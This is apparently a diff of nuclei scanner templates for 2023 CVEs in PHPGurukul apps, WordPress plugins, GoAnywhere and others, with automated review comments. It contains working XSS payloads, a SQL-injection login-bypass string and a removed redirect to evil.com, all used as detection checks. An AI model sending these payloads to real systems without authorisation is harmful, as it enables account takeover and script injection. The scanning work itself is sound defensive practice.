@@ -1,38 +1,49 @@ id: CVE-2023-0527 info: - name: Online Security Guards Hiring System - Reflected XSS + name: Online Security Guards Hiring System - Cross-Site Scripting author: Harsh severity: medium description: | - A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input "><script>alert(document.domain)</script> leads to cross site scripting. The attack may be launched remotely. + A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://vuldb.com/?ctiid.219596 - https://nvd.nist.gov/vuln/detail/CVE-2023-0527 - https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md + - http://packetstormsecurity.com/files/172667/Online-Security-Guards-Hiring-System-1.0-Cross-Site-Scripting.html + - https://vuldb.com/?id.219596 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0527 cwe-id: CWE-79 + epss-score: 0.00228 + epss-percentile: 0.6097 + cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2023,osghs,xss,unauthenticated,reflected + max-request: 1 + vendor: online_security_guards_hiring_system_project + product: online_security_guards_hiring_system + tags: cve2023,cve,packetstorm,osghs,xss,online_security_guards_hiring_system_project + http: - raw: - | - POST /osghs/search-request.php HTTP/1.1 + POST /search-request.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - 
searchdata=%3Cimg+src%3D%22%23%22+onerror%3D%22location.href%3D%27http%3A%2F%2Fevil.com%27%3B%22%3E&search= + searchdata=<img%20src=x%20onerror=alert(document.domain)>&search= - cookie-reuse: true - redirects: true matchers: - type: dsl dsl: - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "<img src=x onerror=alert(document.domain)>")' - 'contains(body, "Online Security Gauard Hiring System |Search Request")' - - 'contains(body, "evil.com")' condition: and +# digest: 4a0a00473045022100a43c27d627e8467ae87028412d582a54888b15b6d467bebb762ba204dbf65113022041c5d7946de5f33a3cbcee2c5c5376022e68453311691ea38e97baf127489725:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0552.yaml b/nuclei-templates/CVE-2023/CVE-2023-0552.yaml index 71940f7e61..ac4799a04d 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0552.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0552.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-0552 cwe-id: CWE-601 - epss-score: 0.00077 - epss-percentile: 0.32318 + epss-score: 0.00092 + epss-percentile: 0.37956 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: cve2023,redirect,pie,pie-register,wpscan,cve + tags: cve2023,cve,redirect,pie,pie-register,wpscan,genetechsolutions,wordpress http: - method: GET 
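Review bot: The rewritten request drops the directory prefix (`POST /search-request.php` instead of `/osghs/search-request.php`), and because raw requests go to `{{Hostname}}` with an absolute path, an instance installed under `/osghs/` as the previous version assumed will no longer be tested; if that is the usual install location, keep both paths or build the path from `{{BaseURL}}`. Replacing the `location.href='http://evil.com'` payload with `alert(document.domain)` is the right call, since a distributed template should not reference a third-party domain in its payload. The `Gauard` spelling in the matcher mirrors the application's own page title and should stay as is.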
@@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 4a0a00473045022100ffe57847ba727759e09229434758c6972ee1d975349abe94f7285118fa09f24702205df2e0c2dc533171b536ecfdfda6692bf6bbae4bc65146a7c667a991daa7fce2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a43102975ca9cbbf8f2d57a5f3a53496de4ac374bde3bcf0ee22cd7990f8c820220148b4d4d1ca0ef65545d30ac6b9ae93ed2bbf928f8b3e981e19fc44b2a19c151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0562.yaml b/nuclei-templates/CVE-2023/CVE-2023-0562.yaml index a2c9ebf15f..64a16cf314 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0562.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0562.yaml @@ -6,17 +6,29 @@ info: severity: critical description: | A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://vuldb.com/?ctiid.219716 - https://nvd.nist.gov/vuln/detail/CVE-2023-0562 + - https://vuldb.com/?id.219716 + - https://github.com/ctflearner/ctflearner classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-0562 cwe-id: CWE-89 + epss-score: 0.02218 + epss-percentile: 0.89242 + cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2023,blms,sqli,bypass + max-request: 1 + vendor: phpgurukul + product: bank_locker_management_system + tags: cve,cve2023,blms,sqli,bypass,phpgurukul http: - raw: 
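Review bot: The added `impact` says the attacker can "extract sensitive information from the database", but what the template exercises is an authentication bypass: the payload `username=admin' AND 4719=4719-- GZHh` with a dummy `inputpwd` and the `BLMS | Dashboard` matcher demonstrate a tautology that logs the attacker in as admin, and the template is tagged `bypass`. Suggest `Successful exploitation allows an unauthenticated attacker to bypass the login form via SQL injection and reach the administrator dashboard, from which further data access is possible.` The `remediation` "upgrade to the latest version" is not backed by the hunk's references, which are vuldb entries and a PoC repository; if no fix is known, say so rather than imply one.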
@@ -27,7 +39,6 @@ http: username=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login= - cookie-reuse: true redirects: true matchers: - type: dsl @@ -36,3 +47,4 @@ http: - 'contains(body, "admin")' - 'contains(body, "BLMS | Dashboard")' condition: and +# digest: 4a0a00473045022100a83e4f426dee5b966ea13ce961702c3c9f146fb91cc171084ddc7b338df6982802205438c91226989896a74aeeae0b041231e409cadbe2eda2301ea0bb1d7eeab9ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0563.yaml b/nuclei-templates/CVE-2023/CVE-2023-0563.yaml index 5ab54becdb..697aba6c71 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0563.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0563.yaml 
@@ -6,17 +6,29 @@ info: severity: medium description: | A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://vuldb.com/?ctiid.219717 - https://nvd.nist.gov/vuln/detail/CVE-2023-0563 + - https://vuldb.com/?id.219717 + - https://github.com/ctflearner/ctflearner classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2023-0563 cwe-id: CWE-79 + epss-score: 0.00249 + epss-percentile: 0.64164 + cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2023,blms,xss + max-request: 1 + vendor: phpgurukul + product: bank_locker_management_system + tags: cve2023,cve,blms,xss,phpgurukul http: - raw: @@ -27,7 +39,6 @@ http: searchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit= - cookie-reuse: true redirects: true matchers: - type: dsl @@ -36,3 +47,4 @@ http: - 'contains(body, "/><script>alert(document.domain)</script>")' - 'contains(body, "Bank Locker Management System")' condition: and +# digest: 4b0a00483046022100d454a122aad91e9dea4225555e6ced18d36bd03530358996ae175eea4f59a9cc022100e8591a78edb324b44d798e9732dd1eef101ead3d5e1f2de0e91e951457f2293a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
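Review bot: The added `impact`/`remediation` document a check whose request does not match its description: the description (and the CVE record) name the `ahname` argument of `add-locker-form.php`, while the request body in the second hunk sends `searchinput=...` and the matcher only looks for the reflected payload on a page containing "Bank Locker Management System". Either the description should state which endpoint and parameter the template actually tests, or the request should target `ahname`. With CVSS PR:H the issue needs an authenticated administrator; the request preamble is outside this hunk so I cannot confirm a login step exists, but if there is none, `verified: true` deserves a second look.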
diff --git a/nuclei-templates/CVE-2023/CVE-2023-0585.yaml b/nuclei-templates/CVE-2023/CVE-2023-0585.yaml index e2b9da71b1..48abd48457 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0585.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0585.yaml 
@@ -1,36 +1,58 @@ -id: wordpress-seo-version +id: CVE-2023-0585 info: - name: wordpress seo plugin < 4.3.0 cross-site scripting - author: Jordan Swebeck + name: > + All in One SEO Pack <= 4.2.9 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder severity: medium - description: Find out if the wp seo all in one plugin version is pre 4.3.0, if so it is vulerable to stored XXS - classification: + description: > + The All in One SEO Pack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 4.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Administrator role or above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3db97180-9308-4891-9de9-acefe31d088f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 cve-id: CVE-2023-0585 - cwe-id: CWE-79 - cvss-score: 7.3 - - tags: cve,cve2023,xss,wp,wp-plugin,wordpress + metadata: + fofa-query: "wp-content/plugins/all-in-one-seo-pack/" + google-query: inurl:"/wp-content/plugins/all-in-one-seo-pack/" + shodan-query: 'vuln:CVE-2023-0585' + tags: cve,wordpress,wp-plugin,all-in-one-seo-pack,medium - -requests: +http: - method: GET + redirects: true + max-redirects: 3 path: - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt" - headers: - User-Agent: "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0" - - matchers-condition: and - matchers: + extractors: - type: regex + name: version part: body + group: 1 + internal: true regex: - - "Improved PHP 8.1 compatibility" - negative: true + - "(?mi)Stable tag: ([0-9.]+)" + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + 
matchers: - type: status status: - 200 - - 304 + - type: word + words: + - "all-in-one-seo-pack" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.9') \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0600.yaml b/nuclei-templates/CVE-2023/CVE-2023-0600.yaml index fff90cdc8a..5cf087ab03 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0600.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0600.yaml @@ -2,7 +2,7 @@ id: CVE-2023-0600 info: name: WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection - author: r3Y3r53 + author: r3Y3r53,j4vaovo severity: critical description: | The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks. 
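Review bot: The rewritten `classification` block drops `cwe-id: CWE-79`, which the old template had and which every other CVE-2023 template touched by this commit keeps alongside `cpe`, `epss-score` and `metadata.max-request`/`vendor`/`product`; restore at least `cwe-id: CWE-79` and `max-request: 1`. The only positive signal is `compare_versions(version, '<= 4.2.9')` on the readme `Stable tag`, which reports the packaged version rather than a confirmed vulnerable behaviour, so a hit is a version inference, and the `and`-ed `words: - "all-in-one-seo-pack"` match on the readme body is worth confirming against a real readme.txt since the plugin's readme uses its display name and may not contain the slug literally. Also note the issue requires an Administrator+ account, a role that already holds `unfiltered_html` on single-site WordPress, so the finding is informational on most installs and the template name should keep the "Administrator+" qualifier it now has.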
@@ -10,26 +10,41 @@ info: reference: - https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4 - https://nvd.nist.gov/vuln/detail/CVE-2023-0600 + - https://github.com/truocphan/VulnBox classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-0600 cwe-id: CWE-89 - epss-score: 0.03606 - epss-percentile: 0.90651 + epss-score: 0.02396 + epss-percentile: 0.89644 cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: plugins-market product: wp_visitor_statistics framework: wordpress - public-www: "/wp-content/plugins/wp-stats-manager/" - tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli + fofa-query: body="wp-stats-manager" + public-www: /wp-content/plugins/wp-stats-manager/ + tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market variables: str: '{{rand_int(100000, 999999)}}' +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Real Time Traffic' + - raw: - | @timeout: 30s @@ -43,4 +58,4 @@ http: - 'status_code == 200' - 'contains(body, "sleep(6)")' condition: and -# digest: 490a0046304402203079d9f015ead5287a351abc4e7e63a4dd32b7e72adb33240f97224e6e24d3f4022053669ab78fd09297e330146fde6cf9b9875d4a83eeafec0ec847cb9ce83851b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220261580cf7a6acf3bd48c82b17b9befe18160f0f95f445a299f518bc9a852492902200976177287be838bdccc1077745ec0a5fb67ea2cbf3048964a74b82748fadfed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0602.yaml b/nuclei-templates/CVE-2023/CVE-2023-0602.yaml index 8d98edfec1..e53dffbe2e 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0602.yaml 
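Review bot: The new preflight step behind `flow: http(1) && http(2)` requests `/wp-content/plugins/wp-statistics/readme.txt`, but the vulnerable plugin is WP Visitor Statistics, whose slug per the template's own `public-www: /wp-content/plugins/wp-stats-manager/` and `fofa-query: body="wp-stats-manager"` is `wp-stats-manager`; `wp-statistics` is a different plugin. On an affected site the first request will most likely 404, the internal `Real Time Traffic` matcher fails, and the SQLi request in http(2) is never sent, so the check silently produces no finding. Change the line to `GET /wp-content/plugins/wp-stats-manager/readme.txt HTTP/1.1`. The sleep-based second request starts in this hunk with `@timeout: 30s` but its body and matchers are outside the visible lines.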
+++ b/nuclei-templates/CVE-2023/CVE-2023-0602.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-0602 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26619 + epss-percentile: 0.26204 cpe: cpe:2.3:a:johnniejodelljr:twittee_text_tweet:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +24,7 @@ info: vendor: johnniejodelljr product: twittee_text_tweet framework: wordpress - tags: cve,cve2023,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet + tags: cve2023,cve,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet,johnniejodelljr http: - raw: @@ -43,6 +43,6 @@ http: dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' - - 'contains(body_2, "<script>alert(document.domain)</script>") && contains(body_2, "twittee")' + - 'contains_all(body_2, "<script>alert(document.domain)</script>", "twittee")' condition: and -# digest: 4a0a00473045022100babf73b767cb60572e97d1d4a1d5d4e392e110d314161963a7c675ff751dc63a022026950b6e73c97186ad09765b249960f90ddee55796af0116166cceba4e3a57b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e5fce08d81164199e113a5e8a44e47e3a80de938ed5284232742f6ec12745cff022100af62d819e8c9fe644c67d22c4e6cb543bfce8719a6d6046b423facdeed2ee8e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0630.yaml b/nuclei-templates/CVE-2023/CVE-2023-0630.yaml index ed1f213cdf..2dfa76c78a 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0630.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0630.yaml 
@@ -6,18 +6,22 @@ info: severity: high description: | The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database, potentially exposing sensitive information. remediation: Fixed in version 4.9.3.3 reference: - https://wpscan.com/vulnerability/b82bdd02-b699-4527-86cc-d60b56ab0c55 - https://wordpress.org/plugins/wp-slimstat - https://nvd.nist.gov/vuln/detail/CVE-2023-0630 + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/RandomRobbieBF/CVE-2023-0630 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-0630 cwe-id: CWE-89 - epss-score: 0.0628 - epss-percentile: 0.92854 + epss-score: 0.05275 + epss-percentile: 0.92293 cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +29,7 @@ info: vendor: wp-slimstat product: slimstat_analytics framework: wordpress - tags: wpscan,cve,cve2023,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated + tags: cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated http: - raw: @@ -50,4 +54,4 @@ http: - 'contains(content_type_2, "application/json")' - 'contains(body_2, "audioShortcodeLibrary")' condition: and -# digest: 4a0a00473045022100d1fef79817abc4e7ec34c73be7386a103e585734b71753bde8bf4613a247b31402201a6ba694f77940ec0a39e4d71f2d32d21847af59acd72d2c81bbf9f8852c9f42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d8cfa34716682707fd04b70f6767f9548456638742f3be97df93a370889381f022100f4b24efcacacbf6795ea4cc37fce07c2968f568e61300a6be831a398ff3fd492:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2023/CVE-2023-0669.yaml b/nuclei-templates/CVE-2023/CVE-2023-0669.yaml index d8a77537cb..5cfa80b391 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0669.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0669.yaml 
@@ -1,22 +1,38 @@ id: CVE-2023-0669 info: - name: GoAnywhere MFT - Remote Code Execution (ZeroDay) + name: Fortra GoAnywhere MFT - Remote Code Execution author: rootxharsh,iamnoooob,dhiyaneshdk,pdresearch - severity: critical + severity: high description: | - Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object. + Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html - https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1 - https://infosec.exchange/@briankrebs/109795710941843934 - https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-0669 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2023-0669 + cwe-id: CWE-502 + epss-score: 0.96954 + epss-percentile: 0.99709 + cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: fortra + product: goanywhere_managed_file_transfer shodan-query: http.favicon.hash:1484947000 - verified: "true" - tags: cve,cve2023,rce,goanywhere,oast,kev + tags: cve2023,cve,rce,goanywhere,oast,kev,fortra -requests: +http: - raw: - | POST /goanywhere/lic/accept HTTP/1.1 
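Review bot: `severity: high` together with `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H` (7.2) contradicts the template's own description, which calls this a pre-authentication command injection in the License Response Servlet, and sits oddly beside the `kev` tag and `epss-score: 0.96954` added in the same hunk. The PR:H value is copied from the NVD record, but the Rapid7 and Fortra references describe unauthenticated exploitation in the wild, and downgrading this below the authenticated WordPress SQLi templates in this commit that keep `severity: critical` skews triage. Keep `severity: critical`; if the NVD vector is retained for fidelity, annotate it, e.g. `# NVD scores PR:H; referenced advisories describe pre-auth exploitation`. The raw request body and matchers are outside this hunk.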
@@ -40,4 +56,5 @@ requests: - type: status status: - - 500 \ No newline at end of file + - 500 +# digest: 4a0a004730450220207c735e2469d6bf2af5178c7053b234490ccaa8584d568bb036adcc0ca0e16c022100dd5efb4ae7b7db86c7b6caee1806c494eeb8c6ce825ea4d94c449c4a09f4ff96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0777.yaml b/nuclei-templates/CVE-2023/CVE-2023-0777.yaml index 1d2fff10de..8bf35a1aaa 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0777.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0777.yaml @@ -11,13 +11,14 @@ info: - https://huntr.dev/bounties/a17e7a9f-0fee-4130-a522-5a0466fc17c7/ - http://packetstormsecurity.com/files/171744/modoboa-2.0.4-Admin-Takeover.html - https://github.com/modoboa/modoboa/commit/47d17ac6643f870719691073956a26e4be0a4806 + - https://github.com/7h3h4ckv157/7h3h4ckv157 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-0777 cwe-id: CWE-305,NVD-CWE-Other - epss-score: 0.07225 - epss-percentile: 0.93333 + epss-score: 0.07913 + epss-percentile: 0.93646 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,7 +27,7 @@ info: product: modoboa shodan-query: html:"Modoboa" fofa-query: body="Modoboa" - tags: huntr,packetstorm,modoboa,default-login + tags: cve2023,cve,huntr,packetstorm,modoboa,default-login http: - raw: @@ -66,4 +67,4 @@ http: group: 1 regex: - csrftoken=([A-Za-z0-9]+) -# digest: 490a00463044022079aa6043e758f14079d797c24ec885aabafcec14adb24f97ef0de712e5be40f8022039a74204f3dfc5fe8cd3d89ac0354ac5bed98746548a647db98fe9d975644e56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008110d9c9ede7516bdf06f10bfcc9c5d842dac83bf1bf95a8ac2f6395b48f72c1022100c305294bead6b092ee60ac6b327382276c3dfbadacec79c73824950d065ca87f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2023/CVE-2023-0900.yaml b/nuclei-templates/CVE-2023/CVE-2023-0900.yaml index 935887f610..70a8fa58fe 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0900.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0900.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-0900 cwe-id: CWE-89 - epss-score: 0.00688 - epss-percentile: 0.77836 + epss-score: 0.00947 + epss-percentile: 0.82798 cpe: cpe:2.3:a:wpdevart:pricing_table_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: product: pricing_table_builder framework: wordpress publicwww-query: "wp-content/plugins/ap-pricing-tables-lite" - tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite + tags: cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart http: - raw: @@ -64,4 +64,4 @@ http: regex: - '_wpnonce=([0-9a-z]+)">Log Out' internal: true -# digest: 4a0a00473045022070b78af2f90dea1c35f6fe9931233ba27bc11cbc0c71a0cc1dacf4848b45bc42022100a9d761cbdb0f3128f6becf43f7675b7df6950e7177360804f5617be708d61c2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205451db383786918c1f14b6751c0ffaeb263600bab8cc76dc938cf3e1847531b902203c9a566e2f17d7cd2501e5dad53491de15f0dcbe0b569a5be1a41ca489e8b894:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0942.yaml b/nuclei-templates/CVE-2023/CVE-2023-0942.yaml index 011f34b1f9..e882c0a3ab 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0942.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0942.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.5.5. reference: - https://wpscan.com/vulnerability/71aa9460-6dea-49cc-946c-d7d4bf723511 @@ -18,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0942 cwe-id: CWE-79 - epss-score: 0.00358 - epss-percentile: 0.69047 + epss-score: 0.0049 + epss-percentile: 0.7561 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: artisanworkshop product: japanized_for_woocommerce framework: wordpress - tags: cve2023,woocommerce-for-japan,wp,wpscan,wordpress,authenticated,cve,xss,woocommerce,plugin + tags: cve2023,cve,woocommerce-for-japan,wp,wpscan,wordpress,authenticated,xss,woocommerce,plugin,artisanworkshop http: - raw: 
@@ -47,4 +49,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "<svg/onload=alert(document.domain)>") && contains(body_2, "woocommerce-for-japan")' condition: and -# digest: 4b0a00483046022100f26ca941a58f9e006361c6154d37515c604d64d5bb72160e705bfe98393fedd2022100d894f6623ab7e3b1338e254ea2a737dbb10b0d5ca47abe9f7c1d6c8fd85b6856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a6154be3977335b0b6a8edafe8ebf0cdc8be8592b0dde724b514055ced4fc0e022100935f1df2f35df2ff8160527c45087dc5c1a387351a1dcc8ea9fea63d30041d53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0947.yaml b/nuclei-templates/CVE-2023/CVE-2023-0947.yaml index dff506c1be..69843c26b2 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0947.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0947.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0947 cwe-id: CWE-22 - epss-score: 0.0263 - epss-percentile: 0.89208 + epss-score: 0.0114 + epss-percentile: 0.84427 cpe: cpe:2.3:a:flatpress:flatpress:*:*:*:*:*:*:*:* metadata: verified: true @@ -24,7 +24,7 @@ info: vendor: flatpress product: flatpress shodan-query: http.favicon.hash:-1189292869 - tags: huntr,cve,cve2023,lfi,flatpress,listing + tags: cve,cve2023,huntr,lfi,flatpress,listing http: - method: GET @@ -39,4 +39,4 @@ http: - 'status_code == 200' - 'contains(body, "<title>Index of /fp-content")' condition: and -# digest: 4b0a00483046022100d1959892b42af2b745bb53da64fbd3303c9418574343b186a84eea4fa7b9477d022100c0b4e200502ddcb01ea54dec4e9226876ef5eed3631ee26029ccb298ad0c4de1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a6fad072aa7b7a33eeb7febfa517c81a87cdd0458f78e659f4436d97e14cda8c02201122c5d07ec27092761f1e6d267c54e6cd56b9d6df20fe247ee60f0783601bd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
